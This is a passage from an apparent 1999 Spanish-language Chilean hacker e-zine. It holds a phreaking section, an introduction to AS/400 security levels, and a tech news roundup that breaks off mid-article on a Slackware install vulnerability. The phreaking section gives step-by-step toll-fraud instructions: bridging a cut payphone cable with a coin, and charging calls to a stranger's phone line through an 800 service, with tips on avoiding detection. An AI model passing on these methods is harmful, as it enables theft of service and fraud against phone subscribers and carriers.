La funci¢n MacroCopiar con el par metro 1 (cualquiera distinto de 0 servir¡a)
hace que la macro resultado de la copia sea SOLO EJECUTABLE (no la podremos
editar), con lo cual conseguimos una macro encriptada!
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#################################
ø ø
ø 16.- Phreak a la carta ø
ø ø
ø ø
#################################
________________________________________________________________ By Varios
Quiero Agradecer enormemente a plaxius y sus secuaces por enorgullecernos
con el primer magazine Chileno... les deseo la mejor suerte en este
proyecto...
si puedes explicar lo de la R del titulo... agradecido.
aqui les dejo un modesto aporte a la causa.
Sopita al Gratin
----------------
Preparemos una pequeña sopita... (bien sabrosona.. para los novatos)
La cual te permitira realizar llamadas nacionales gratix, solo nacionales ya
que estos telefonos solo realizan este tipo de llamadas... aunque no e
intentado
con blue-box.
Ingredientes:
-------------
-Un telefono publico amarillo: De los antiguos que tienen un auricular negro
lo puedes encontrar en varias partes... aunque no lo creas (yo he visto
varios
en diversos lugares de Chilito), requisito indispensable... que tenga el
cable
de conexion al alcance de tus manos.
-Dos monedas de 0
-Un elemento cortante(llamese cuchillo, chaveta, hoja de ajeitar es mas
efectiva).
-buen pulso.
Preparacion:
------------
Bierta el contenido...
Tomas la navaja y realizas un corte el cable evitando que los hilos de
cobre
se corten (caso contrario... la cagaste!!), trata que el corte no sea muy
evidente,
para que puedas volver a usar este metodo. Luego incerta la moneda para
realizar la
llamada... Ya has marcado el numero y se esta intentendo la comunicacion.
Este lapso que tienes de tiempo entre que terminas de marcar el numero y te
contestan...
es el que vamos a utilizar para puentear los hilos de cobre con la otra
moneda.
Mientras mantienes puenteados los cables, debes colgar el telefono de manera
que caiga
la moneda, recoges tu moneda, descuelgas nuevamente y dejas de puentear los
cables.
Agregados
---------
Debes tener la preacucion de que los cables esten bien enlazados mientras
realizas la
secuencia... caso contrario se te cortara la comunicacion.
Otra alternativa es que con la misma navaja realices la conexion y asi te
evitas hacer
un corte... en fin hay muchas variantes.
(PlaXiuS.- Bien por fin alguien me acordo de este trukito que practicaba
cuando iba en media ufff !!!
si no recuerdan al tiempo despues le pusieron un tipo de forro de metalico
al cable del auricular para que no
hicieran el trukito , asi k a alguien se le ocurrio meter un clip abierto al
microfono del auricular hasta k toque metal , ahora solo tiene que conectar
la otra punta del clip a algun tornillo (tierra) y listo !!! lastima k
despues tambien blindaron las capsulas )
Si alguien tiene alguna otra recetita de algo parecedo... que me la
comunique.
si alguien quiere hacer halgo de phreak que me escriva y podemos
intercambiar informacion
Venabente
Type Bits/KeyID Date User ID
pub 1024/31DAE55D 1999/03/05 venabente <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia
mQCNAzbgLr4AAAEEALcmp3mfd0wiouVuPtqCAKGn//nF4lZFwQpA8ft020k5DqrD
RM9aTsvZQpLLzvcEVIH2pm0JNFr6MAFOV4CPEokaZXYMC66p7jVaALLp93RQRwsp
815WSFBo/iRh5CKevoIHXF8E4Bs4KzxEZP6VSye17W4tc+dFJ1Mv3pEx2uVdAAUR
tCF2ZW5hYmVudGUgPHZlbmFiZW50ZUBiaWdmb290LmNvbT6JAJUDBRA24C6+Uy/e
kTHa5V0BAVWxA/wPiSPJ4x2uaWfHo8WrJZO7ZC1ny8I+bNlL5Y/Ufh6zFB+WWWy0
ZTOz4hESynAXZTDDb6b+/5SLwUs2JNOLhSiAB8l7PpCFVebAL7yP5fijQTWk4paa
CtH+0L5IjrQGM/jDEBy2zr24uMuav+TEsHAOpVNjZ1/LhyPLRWJfwPWNtQ==
=OHUM
-----END PGP PUBLIC KEY BLOCK-----
Trucos de Phreak en chile
-------------------------
by moonspell
aqui los dejos con algunos trucos de phreak en chile
Llamar desde cualquier telefono y se le carga a la cuenta de otra persona
(garantizado 100%)
Primero tienes que estar en casa de algien que no conoscas o que conoscas
poco, ya que al final de mes sale el numero que llamo y el numero al cual
llamaste.
Llama a 800210188 te va a salir una operadora con voz de puta (indigo),
diciendo bienvenido bla bla bla, luego selecionas activar el servicio, te
va pedir que ingreses el telefono del cual estas llamando y luego * ej.
45-84xxxx * o 2-554xx * , y seguidamente de esto te pedira una clave secreta
de 4 numeros ahi va tu imaginacion despues te va a pedir que la ingreses
denuevo, ahi tu , despues te va a decir "felicitaciones bienvenido a la wea
de mierda de la callampa y listo"
ya ya ya ya hice todo esto y pero como cuando donde.......
Lo ideal es que llames desde un telefono publico al 800210188 y seleciones la
opcion para realizar llamadas, en seguida ingresas el numero que activaste
seguido de un * tu clave secreta y el numero al cual vas a llamar y VOILA...
listo
Recomendaciones:
- Nunca llames a tu casa
- Nunca llames a la casa de algun conocido de la victima
- Ojo simpre desde un telefono publico
Este truco esta garantizado 100% y de como lo usen ustedes es cosa suya yo
no me hago responsable del mal uso de ella
Quieren otro aqui les va otro
Telefono azules chicos
Este truco me a resultado un par de veces y espero que a ustedes tambien
La cosa es mas que simple 131* r (esperai tono) #* y el numero que vai a
marcar y listo Y mas todavia......
Celulares Pcs (entel)
Este truco no le he probado ahun por ke no tengo celular y ninguno de mis
amigos que tiene usa entel
En el chip hay que pincharlo con una aguja o algo asi y el resultado es que
el que llama paga (seria medio inutil realizar este truco despues de 24 de
febrero de 1999 por ke por fin va a salir el que llama paga) pero pienza
que seria util si usas de esos con tarjeta..........
Ja ja ja ja Hay mas.............
Telefonos Blancos donde hay que apretar un boton verde para contestar
El truco radica en que hay que marcar y colgar ej
numero 123456
marcas 1 cuelgas
marcas 2 cuelgas
marcas 3 cuelgas
etc etc etc
y el ultimo no lo cuelgas
Facil no......
para mas info visita mi pagina de phreak, la primera en chile que yo conosca
en http://pagina.de/moonspell
Moonspell 1999 todos los derechos reservados
Pues amigos Chilenos, ya saben, a Visitar la Pagina de Moonspell
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#################################
ø ø
ø 17.- Introduccion Al AS/400 ø
ø II Parte ø
ø ø
#################################
______________________________________________________________ By The TAkER
Ok, despues de la cantidad impresionante de propaganda que le hice al
400 en el articulo pasado, ahora si vamos a entrar en materia, primero
vamos a hablar algo sobre las conexiones:
Uno de los metodos mas utilizados para las conexiones locales de pantallas
e impresoras es por medio de cable Twinaxial, que para explicarlo en una
forma sencilla, es algo asi como el el cable coaxial, con la diferencia
que este en vez de tener un alabre de cobre en el centro tiene dos, seria
algo como:
____________
Hilo de Cobre ____\######.
Hilo de Cobre ____ )###### Enmallado Tradicional
/######ø
øøøøøøøøøøøøø
Cubierta Plastica
Esa es mas o menos una mala representacion de un cable Twinaxial, talvez
para los que no entiendan muy bien ponga un jpg por ahi en algun lado, pero
por ahora dejemoslo asi..
Ok, estas conexiones locales se hacen por medio de un controlador que consta
de 4 u 8 bocas (depende de la necesidad de conexiones, pero no es un
obstaculo mas tarde veran porque), este controlador es de la siguiente
forma:
/øøøøøøøøøøøøøøøøøøøøøøøøøø/|
/__________________________/ |----------------
| | |------------------
| .-. .-. .-. .-. | | Conexion al AS
| ( 0 ) ( 1 ) ( 2 ) ( 3 ) | |
| ø-ø ø-ø ø-ø ø-ø | /
|___________________________|/
Ahora imaginen que cada una de esas cosas redondas que ven ahi son bocas
para la distribucion de cables Twinaxiales, y a cada de uno de esos Cables
que salen se le pueden conectar 7 Dispositivos (Pantallas o Impresoras), o
sea que en este ejemplo podemos tener hasta 28 dispositivos, lo unico que
hay que tener en cuenta es que el primer dispositivo de la boca 0 (cero)va
a ser la consola de nuestro sistema, de ahi para adelante que venga lo que
sea.
Ahora veamos un pequeno diseno de lo que podria ser una red de terminales
conectadas a un sistema AS/400
____ C. ___ ___
| | _ | | | |
| | | |--------------------|_____|-----|___|
| |----| |----------. DSP0200 PRT02
|____| |_|-. |
AS/400 | _|_
_|_ | | DSP0100
Consola o | | |_____|
DSP0000 |_____| |
| _|_ ___
___ _|_ | | | |
| | | | |_____|----|_____|
|___|-----|_____| DSP0101 DSP0102
PRT0002 DSP0001
Aunque hay muchos mas tipos de conexiones, solo explicare esa porque es solo
una pequena introduccion y no pretendo escribir un gran manual sobre esto,
o sea que dejare por aqui, no sin antes decir que tambien se puede tener una
tarjeta de red en el 400 y accesarlo por medio del protocolo TCP/IP.
En el se pueden configurar servicios de Telnet, http, ftp y todos los
servicios que ofrece un servidor de Web.
Bueno, sigamos con este texto, busque y busque informacion sobre 400 en Inet,
pero la verdad me fue un poco dificil encontrar algo que hablara
especificamente de hackear sistemas AS/400, no se, creo que debe ser por que
tenga un gran sistema de seguridad (como lo vamos a ver mas adelante), o por
que hasta hace poco solo podian ser accesados de manera local, lo cual hacia
que fuera muy dificil hacer muchas pruebas sobre el, pero desde que cuenta
con el protocolo TCP/IP ya hay muchos en la red.
Con esto no quiero decir que el sistema sea facil de Hackear, pero si les
puedo asegurar que no es invulnerable.
Una de las mayores caracteristicas de un sistema AS/400 es su seguridad, pues
como ya veran tiene varios niveles de esta...
Niveles de Seguridad:
Nivel 10:
Este nivel es el que viene por defecto en el AS/400 cuando sale de
fabrica, y si el administrador tiene algo de frente y lo utiliza, debe
cambiar de inmediato a otro nivel, yo diria que a un 30 o 40...pues de lo
contrario no tendra seguridad de ninguna clase y estara expuesto a todo tipo
de peligros... XDDD
A ver, lo pongo en castellano, cualquier persona que desee, puede entrar al
400 digitando un nombre de usuario cualquiera, o sea, hpy puede poner Hacker,
manana usara Hackersito, y el sistema lo aceptara sin problemas, es como
tener una cuenta anonymous con todos los derechos de un root. increible no ??
Nivel 20:
En este nivel, los usuarios deben tener un nombre de usuario y un password,
al entrar al 400 tienen todos los derechos sobre el sistema, o sea pueden
hacer cualquier cosa que se les antoje...XDDD, asi que tampoco es muy
recomendable.
Nivel 30:
Seguridad de objetos, el usuario ademas de entrar al 400 con un nombre de
usuario y un password valido, solo tiene derecho a accesar los objetos que
tiene asignados por medio del user profile.
Este es el nivel minimo recomendado para todos los sistemas AS/400.
Nivel 40:
El usuario en este nivel debe proporcionar un nombre de usuario y un password
para entrar al sistema, ademas de la seguridad de objetos, el sistema
proveera seguridad adicional contra riesgos de integridad potenciales a la
interface de la maquina, los cuales pueden ser generados por programas
desarrollados para este fin.
Esta seguridad adicional consta de:
* Prevenir el uso de interfaces no soportadas
* Prevenir el uso de Instrucciones restringidas
* Proteger las descripciones de los Trabajos
* Prevenir el acceso a las terminales sin el uso de passwords
* Proteccion a base de hardware
* Proteger el espacio asociado a los programas
* Proteger el espaciio asociado a los trabajos
* Validar los programas que seran restaurados de una copia
Nivel 50:
Este nivel esta disenado para sistemas que requieran de un nivel de
seguridad muy alto, ya que esta disenado para cumplir con los requerimientos
exigidos por el departamento de defensa de los Estados Unidos (woooowww....)
en el C2.
En este nivel se cuenta con toda la seguridad proporcionada en el nivel 40
y mejoradas con las funciones descritas a continuacion. Hay que anotar que
cuando se corre el sistema con nivel de seguridad 50 se puede notar una baja
en el desempeno de la maquina debido a todos los chequeos adicionales que la
maquina hace.
* Restringir el dominio de tipo de objetos a los usuarios
* Validar parametros
* Restringir los mensajes que se manejan entre los usuarios y el estado de
los programas del sistema
* Prevenir la modificacion de bloques internos de control
* Convertir la biblioteca QTEMP una biblioteca temporal
El nivel de seguridad del sistema puede ser cambiado por un usuario que tenga
las propiedades correctas para tal efecto (*allobj o *secadm), y se puede
cambiar en cualquier momento, pero para que tomen efecto se debe hacer un IPL
(IPL = Initial Program Load o reset a la maquina), mierda, esto me recuerda a
mi Guindoze 95, ademas los dispositivos tambien pueden ser configurados para
que sean reconocidos automaticamente como en mi Guindoze 95...PNP...???
Algunos otros valores relacionados con la seguridad
* QMAXSIGN: Controla el numero maximo de intentos invalidos de de un usuario
por accesar el sistema, despues de estos el sistema toma las
acciones que se encuentran especificadas en el valor QMAXSGNACN
* QMAXSGNACN: Determina lo que hara el sistema despues de que un usuario ha
alcanzado el numero maximo de intentos invalidos para entrar al
sistema, los valores posibles son:
1. Deshabilitar el dispositivo
2. Deshabilitar el perfil del usuario
3. Deshabilitar el dispositivo y el perfil del usuario
* QINACTITV: Especifica cuantos minutos puede estar inactivo el dispositivo
antes de ser deslogeado del sistema. Esta accion previene a los
usuarios de dejar sus estaciones de trabajos firmadas e inactivas
* QINACTMSGQ: Especifica la accion que tomara el sistema cuando un trabajo
interactivo ha estado inactivo por un cierto periodo de tiempo,
el trabajo puede ser terminado, desconectado o se puede enviar un
mensaje a una cola de mensajes especifica.
* QPWDEXPITV: Controla el nunmero de dias que un usuario puede entrar al
sistema sin cambiar el password, 7 dias antes que se cumpla el
valor especificado, el usuario recibira un mensaje avisandole
sobre el hecho cada vez que entre al sistema.
Y eso es todo por ahora, espero que hayan aprendido algo acerca de la
seguridad en los sistemas AS/400, en el proximo articulo creo que escribire
algo sobre algunos ataques al sistema, nos vemos pronto...
y que VIVA EL HACK...!!!
The TAkER
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###################
ø ø
ø 18.-BackDoorS ø
ø NEWS ø
ø ø
###################
_________________________________________________________ By Mate Swichman
MKLINUX TEAM ##############################################################
Bueno este es un proyecto que llevamos hace bastante tiempo en nuestros
planes , ya que no podemos dejar y reservar las posibilidad de adquirir
este SO a un grupo de personas .. la idea es masificar linux y crear
una comunidad gigante en latinoamerica , hay muchso proyectos sobre linux
y su documentacion pero nosotros dandonos un pokito de ganas hemos
decidido regalar este sistema operativo . En un principio pensabamos
regalar el CD asi no mas gratis .. pero pensandolo bien , despues de
algunos buenos consejos ( que la verdad no somos multimillonarios como
para poder comprar cajas y cajas de CD ) hemos tenido un par de ideas para
realizar el proyecto en forma masiva ...
1.- Conseguir auspiciadores : es decir una empresa o marca que se ponga
con los CDs virgenes que podrina llevar algun tipo de Logo de la misma.
2.- Pedirle a los interesados reponer el CD a medida que reciben uno .
De esta forma este proyecto podria ser constante y podriamos hacerlo
perdurar un buen tiempo .
Las distribucion que repartiriamos seria en este momento REDHAT 5.2 que
seria una de las distribuciones mas soportadas y faciles de usar , y
tambien una version de SUSE 5.2 , que tiene la particularidad de ejecutarse
desde el CDROM ocupando solo unos 60 MB de tu disco duro si necesidad de
nuevas particiones ni de borrar discos .. el problema de esta version de
SUSE es que no podrias cambiar modulos del Kernel y las configuraciones
estarian semi restringidas .. (cosa no muy buena si queremos curiosear)
Bueno y como seria el asunto , si vivies cerca de algun repartidor oficial
de MKLINUX TEAM , podrias llevar tu CD VIRGEN , entregarlo y de esta forma
recibir tu distribucion de LINUX . Ahora si llevas 2 CDs o mas no nos
haria nada de mal jejeje .. Solo se entregara Un CD por persona ya que
todos tienen el derecho de acceder a el !!!
Si vives lejos de algun distribuidor oficial , deberas enviar tu nombre
direccion a la caul te enviaremos tu CD , pero deberas cancelar los gastos
de envio y el costo del CD que serian alredor de 4 dolares . Bueno es lo
mas que podemos hacer por que si comparas algunas empresas que venden una
distribucion REDHAT a 40 dolares creo que el esfuerzo vale la pena o no .
La lista de distribuidores oficiales se dara a conocer en la web y en los
proximos numero de proyecto_r .
Ahora si quieres pertenecer al MKLINUX TEAM que por su puesto tendran
creditos dentro de los CDLR solo tiene que enviar un correo a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
con el subjet MKLINUX TEAM
indicandonos el tipo de colaboracion ... lo mismo correo si deseas ser
distribuidor oficial .
MKLINUX TEAM
Notas del autor: Antes de detallar algunas de las noticias ocurridas durante el
ultimo mes, las cuales dicho sea de paso, me han quedado muchas sin editar. Debo
hablar de los proyectos a futuro de Moco$oft. Ya que fui invitado a participar
de los nuevos productos que esta empresa sacara al mercado durante le proximo
año. Principalmente participe en la presentacion de Office 2000, Visual Basic 6,
Exchange 5.5 y algun que otro. Para los que estamos esperando la era Linux,
debo decir que va a ser muy dificil, ya que los productos que se presentaron
a decir verdad, exceden ampliamente las espectativas, en estos productos,
como mencionarlo de otra manera, vienen bastante avanzados. Obviamente,
durante la presentacion de Office 2000, no faltaron las caidas del sistema,
a un promedio de cada 15 o 20 minutos, de por si es una version Beta, o sea,
para Moco$oft, seria casi definitiva.
Ahora yo me pregunto. Si los productos que presentaron logran hacerlos funcionar,
que no se cuelguen ni se claven, serian muy buenos, eso si, deben hacer algo
con Windows 98, ya que esto es practicamente un parto, (no puede funcionar tan mal).
Desde mi punto de vista, tengo opiniones varias. Por ejemplo: Que seria de
America Latina sin el Windows ?, en estos momentos acapara practicamente el
80% o 90% del mercado, espero que los que estamos en el tema podamos hacer migrar
toda esa basura hacia otra plataforma mas robusta. Me preocupa el echo de
Quien va a competir contra Office 2000 ?, un producto similar pero en otro
sistema operativo, que desplace a Windows.
Ademas de todo esto me han regalado, para evaluar la ultima version de Windows
WorkStation, Windows Service Pack y Windows Option Pack, todavia no me he
dedicado a probar estos paquetes. Es que tengo la sensacion de estar apollando
el monopolio.
En definitiva, la empresa de Bill Gato, se viene bastante pesada, con un
marketing que muy pocos pueden enfrentar, el futuro, aparentemente de Office
2000, va a ganar el mercado como lo hizo su antecesor y aparentemente con
muchas mas opciones y obviamente con muchos mas problemas de programacion, y
eso que ni hable de Visual Basic, otro elemento mas :-{
Espero que las empresas Latino Americanas, tomen consiencia y de una vez por
todas opten por mejores productos, la informatica influye sobre muchas ramas
de la ciencia y la tecnologia, no se puede estar bromeando con sistemas como
Windows 98.
PD: Que bien que funciona el Debuger de los productos Moco$oft. ;-)
UNA COMPAÑIA NORTEAMERICANA OFRECE PCS A SOLO U$S 299
Una pequeña y no muy conocida empresa de Seattle marcó un nuevo tope en
cuanto a los precios de las computadoras personales económicas al anunciar
que empezará a ofrecer sistemas por sólo 299 dólares.
Microworkz, la casi desconocida compañía en cuestión, informó que a partir
de abril comenzará a vender ésta PC de muy bajo precio que también incluirá
un año de acceso a Internet.
Tras realizar el anuncio, la compañía afirmó que no se trata de un sistema
redituable, e incluso el propio presidente de la firma, Rick Latman,
comentó que "el objetivo no es hacer plata con éstas computadoras de 299
dólares, aunque seguramente será un producto de gran alcance".
La rama Cyrix del fabricante de chips National Semiconductor es el
estratégico socio de Microworkz, comentó Latman. Fundada en 1991,
Microworkz comenzó como un vendedor independiente de software personalizado
pero desde febrero del año pasado decidió comenzar a vender computadoras
personales en forma directa.
La línea de PCs Webtzer de Microworkz es el "caballito de batalla con el
cual se buscará llevar PCs e Internet al 55 por ciento de los hogares
norteamericanos que todavía no tienen computadoras", según comentaron
representantes de la empresa.
La Webtzer Jr. de 299 dólares incluye un procesador Cyrix de 300 MH-z, 32
MB de memoria, un disco rígido de 3.2GB, un módem de 56-kbps, Windows 98, y
Corel WordPerfect Suite 8, más conexión a Internet.
Esperanzado con en el éxito que tendrá con los nuevos sistemas, Latman
manifestó que su compañía que actualmente cuenta con 45 empleados sumará
próximamente otros 36 para poder cumplir con la demanda.
MICROSOFT ADMITIO PROBLEMAS DE PRIVACIDAD
La compañía de Bill Gates quedó expuesta la semana pasada cuando Richard
Smith de la firma Phar Lap Software manifestó que el Windows 98
Registration Wizard más conocido como RegWiz- instalaba números únicos de
identificación en las computadoras. Según Smith, esos IDs luego eran
transmitidos al site de Microsoft durante la registración.
Al mismo tiempo, la revista Windows Magazine publicó que no sólo se trataba
de información en los sistemas de los usuarios que se enviaba a
Microsoft.com, sino que era posible para cualquier site en la web leer y
cambiar esa información sin que el usuario se enterara.
Rápidamente, representantes de Microsoft manifestaron que cualquier dato
enviado al server de la empresa no es reconocido como una transacción
válida y, por consiguiente, es descartada. Por lo tanto, ningún tipo de
información personal enviada a Microsoft pasa a formar parte de una base de
datos de la compañía. (JA JA JA ;-))
Dicho esto, la empresa de Bill Gates está eliminando el ofensivo código, al
mismo tiempo que proveerá una herramienta que podrá bajarse de Internet
para que los usuarios puedan borrar el hardware ID de las registraciones de
Windows. Por último, la compañía planea realizar un control interno para
asegurarse que la información recolectada sea eliminada y de que no quedará
en sus bases de datos. Microsoft afirmó que los datos obtenidos se
recogieron a través de una falla en el sistema, y que de ninguna manera fue
algo premeditado.
Dwight Davis, analista del ámbito informático y antiguo editor de Windows
Magazine, manifestó que le cree a Microsoft (?) sobre que se trató de un error
involuntario, pero que "si realmente ellos no sabían lo que estaba
sucediendo, todo este asunto no habla muy bien de cómo supervisan el
funcionamiento de sus productos".
MICROSOFT IMPLEMENTARIA UNA IMPORTANTE REORGANIZACION
El presidente de Microsoft Steve Ballmer está preparando un plan de
reorganización que dividiría a la empresa de software más grande del mundo
en cuatro unidades de trabajo diferentes, poniendo especial énfasis en todo
lo relacionado con la web e Internet.
Una fuente cercana a la compañía de Bill Gates manifestó que los detalles
sobre el futuro plan no serían anunciados antes del próximo 18 de marzo,
fecha en la que Microsoft hará debutar al Internet Explorer 5, la más
reciente versión de su browser.
Pero aunque faltan un par de días para el anuncio oficial, ya se conocen
algunos detalles sobre la reorganización. Según distintos ejecutivos de la
industria, una de las unidades se concentraría en las operaciones de
Microsoft de la web y el comercio electrónico. Otra se abocaría al
desarrollo de software empresarial y para grandes negocios, una tercera se
dedicaría al software profesional, mientras que una cuarta se concentraría
en trabajar sobre el software Office para darle un pequeño giro y acercarse
en forma más directa a las necesidades de los trabajadores.
"Estamos analizando diferentes cambios para nuestra estructura interna",
aseguró el vocero de Microsoft, Dan Leach, quien si bien no precisó más
detalles agregó que "si se analiza la historia de la compañía, Microsoft
realizó constantemente ajustes en su estructura para tratar de satisfacer
las necesidades de los usuarios de la forma más efectiva posible".
En los últimos cinco años, Microsoft realineó sus operaciones y directores
superiores aproximadamente cada 18 meses para poder responder de mejor
manera ante nuevas tecnologías, mercados o estrategias de sus competidores.
La última gran reorganización se produjo en diciembre de 1995 cuando
Microsoft concentró sus operaciones sobre todo lo relacionado con Internet,
un mercado al que hasta entonces no le había dedicado mayores esfuerzos.
LLEGA UN NUEVO SISTEMA DE VIDEO ENVOLVENTE
Así como el sonido envolvente ya no es una novedad para muchos dispositivos
de audio, ahora se anuncia la llegada de una nueva tecnología "de
inmersión" para video a través de la cual los espectadores pueden navegar
por una envolvente esfera de video. Desarrollado en conjunto por Immersive
Media y Enroute Imaging, el RoundAbout Immersive Video System va más allá
de la realidad virtual al exhibir video en lugar de imágenes estáticas. Y
varias empresas ya se mostraron interesados en el sistema. Intel lo está
utilizando para la presentación de su procesador Pentium III, mientras que
una productora de Los Angeles está preparando demos de películas "de
inmersión" como así las denominan- y publicidades interactivas.
Los programadores del RoundAbout creen que su trabajo puede dar paso a una
futura televisión en tres dimensiones, mientras que el sector militar de
los Estados Unidos cree que puede ser incluido en la construcción de
misiles.
En lugar de realizar paneos de fotografías estáticas, el RoundAbout le
permite al espectador navegar por una esfera de video con acción en vivo,
teniendo la posibilidad de hacer una pausa, rebobinar, e incluso acercarse
o alejarse de una escena con lo que permite crear tours interactivos tanto
de un museo como de una película no lineal. El sistema diseñado por
Immersive Media agrupa once cámaras de video en un dispositivo del tamaño
de una pelota de fútbol para captar simultáneamente acción en todas las
direcciones. Utilizando el software de Enroute Imaging, las tomas separadas
son unidas para crear una única esfera de video de alta calidad.
Los espectadores pueden navegar un video RoundAbout en una computadora
personal, pero el sistema resulta mucho más efectivo si es proyectado en
pantallas curvas sobre la cabeza -como las de los planetarios-, o en los
cascos de realidad virtual.
http://www.wired.com/news/news/technology/story/18364.html
NETSCAPE PRESENTO UNA ACTUALIZACIÓN DE SU BROWSER Y CORRIGIO FALLAS
Netscape Communications dio a conocer ayer una actualización de su
navegador en el cual soluciona algunas fallas relacionadas con la seguridad
del mismo, mientras que también aprovechó para expandir sus capacidades en
el servicio de mensajes instantáneos, y para ofrecerle a los usuarios la
posibilidad de acceder a informes bursátiles desde la barra de direcciones.
La versión 4.51 del Communicator de Netscape, la primera con pequeñas
modificaciones desde la aparición del modelo 4.5 en octubre pasado,
remienda un trío de huecos en la seguridad del navegador que fue
descubierto hace pocos meses por "cazadores independientes de fallas" que
avisaron a la empresa. Dos fallas permitían realizar "engaños" en los
frames y las ventanas del browser, mientras que una tercera ponía en
peligro la información privada de los usuarios al exponer peligrosamente
datos confidenciales. Además de corregir las fallas, la actualización
incluye un servicio a través del cual los usuarios pueden consultar las
acciones de la bolsa directamente desde la barra de navegación del browser.
Llamado Quotes Anywhere, el flamante sistema permite tipear la palabra
"quote" y acceder inmediatamente a los reportes del canal financiero del
Netcenter, el portal de Netscape. Quotes Anywhere es un nuevo ejemplo de
cómo Netscape está utilizando su browser para incrementar el tráfico de
usuarios en su Netcenter, ya que con éste servicio, quienes naveguen por la
red con el Communicator y quieran informarse sobre las acciones seguramente
lo harán a través del mismo y no ingresarán a sites de la competencia. La
actualización 4.51 también incluye la versión 2.01 del software Instant
Messenger de America Online, el cual cuenta con capacidades para chatear.
Para los que quieran obtener Netscape gratis pueden ir a:
www.netscape.com/computing/download.com
EL DIARIO LE MONDE SOLO PUDO LEERSE EN LA WEB
A raíz de problemas originados en el sistema informático con el que se
produce el diario, el prestigioso periódico francés tuvo que suspender su
edición del día lunes, por lo que sólo pudo consultarse su versión digital
a través de Internet. Le Monde, que en diciembre pasado cumplió 54 años de
vida, ya había impreso más de tres mil copias de la edición de antes de
ayer cuando las rotativas se bloquearon a raíz de inconvenientes originados
en las computadoras de la empresa. Al no poder resolverse la situación en
forma inmediata, su director, Jean-Marie Colombani, decidió que el diario,
por primera vez en su historia, no saldría a la calle el día siguiente.
Pero todos aquellos que no se resignaron empezar la semana sin leer Le
Monde, pudieron hacerlo a través de la versión digital del diario que se
publica, al igual que gran parte de los periódicos más importantes del
mundo, diariamente por Internet. De esta manera, en la homepage del
principal vespertino francés podía leerse un mensaje que decía que "a causa
de un incidente técnico, la edición de papel no está disponible en los
quioscos pero puede consultarse gratuitamente en la web".
www.prnewswire.com
SORPRESIVO ACUERDO EXTRAJUDICIAL BENEFICIA A INTEL
El staff de la Comisión Federal de Comercio (FTC) de los Estados Unidos
llegó ayer a un acuerdo fuera de los estrados con Intel, un solo día antes
de que diera comienzo el esperado juicio por prácticas monopólicas en su
contra. "Si finalmente es aprobada por todos la comisión, el acuerdo
propuesto resolvería los alegatos incluidos en la presentación realizada
por el organismo el 8 de junio del año pasado", afirmó William Baer,
director del Bureau of Competition de la FTC. Más allá de lo informado a
través del comunicado que difundió, la FTC no dio detalles sobre el acuerdo
al que llegó con Intel que resuelve el tema de las acusaciones en las que
se afirmaba que la compañía había actuado de manera desleal contra tres de
sus competidores. Tras el anuncio de ayer, la FTC presentará una moción
para remover el juicio, lo que provocó una grata sensación de alivio entre
los ejecutivos de Intel. Sin abundar en detalles, un vocero de la compañía
manifestó que "Intel está muy satisfecha con este acuerdo, al mismo tiempo
que considera que provee un valor adecuado para la propiedad intelectual de
la empresa".
LAS LAPTOPS DE COMPAQ OFRECERAN EL NUEVO CHIP K6-2 DE AMD
En el competitivo mundo de los procesadores, cada paso que da una empresa
sea pequeño o grande- marca una diferencia con la competencia. Y AMD dio
el suyo ayer al hacer debutar una nueva versión de su procesador móvil K6-2
y ganarse a Compaq como un nuevo consumidor para vender los chips a través
de sus laptops. AMD manifestó que el flamante procesador es hasta un 50 por
ciento más rápido que el chip móvil Celeron 300 de Intel, uno de sus
competidores más importantes. Para AMD, llegar a acuerdos con destacados
vendedores de sistemas es algo fundamental para darle batalla al gigante
Intel. Hasta ahora, Compaq ofrecía los procesadores de AMD en computadoras
del tipo desktops, pero no en laptops. A su vez, Intel no se queda de
brazos cruzados y anunció que su chip para sistemas móviles podrá trabajar
a 500 o 600 MHz haca fines de año. Pero AMD ya tiene preparada su respuesta
y espera sacudir el mercado de los procesadores para notebooks cuando
presente su K6-3 después de mitad de año. Según se comenta, el flamante
chip será más rápido que el K6-2 y, aunque es probable que no exceda en
cuanto a velocidad al próximo procesador de Intel, sería más compacto, más
económico, y consumiría menos energía.
INSTALACION POR REDVULNERABLE EN SLACKWARE
Slackware, una de las más conocidas distribuciones de Linux es
vulnerable al instalarse en entornos de red. El sistema permite
por defecto el acceso remoto al nivel de root sin password.
Durante la rutina de instalación de Slackware, existe un periodo
de tiempo durante el cual el sistema es vulnerable a un login
remoto como root a través de telnet. La duración de este periodo
depende del factor humano y puede comprender desde minutos hasta
varias horas e incluso más. Esta vulnerabilidad se encuentra
presente al habilitarse las opciones de red por defecto en el
kernel disponibles en "net.i".
Un ataque a estos sistemas es factible gracias a un conjunto de
despropósitos que comienzan con que Slackware inicia y completa
su instalación sin establecer la password de root. Esto conlleva
que tras reiniciar por primera vez, el sistema se encuentra sin
password en la cuenta de administrador. A este problema local
debemos de sumar que por defecto se encuentran activados telnetd
y rlogin en inetd.conf, que se agrava con la configuración del
fichero /etc/securetty que permite el acceso root remoto
incluyendo entradas desde ttyp0 hasta ttyp3.
El arranque de los distintos componentes que forman el sistema se
va produciendo paulatinamente. En el caso de inetd, se activa en
los primeros momentos, con lo que se habilitan las conexiones de
red incluso antes de que se pueda establecer comunicación local a
través de la consola. Es en este momento cuando el sistema empieza
a ser vulnerable, y continuará así hasta que el administrador
establezca la password de root o deshabilite ciertos servicios.
El tiempo que puede pasar entre que el sistema arranca por primera
vez y se accede a la consola local, hasta que se establece la
password, depende exclusivamente del factor humano. Parece
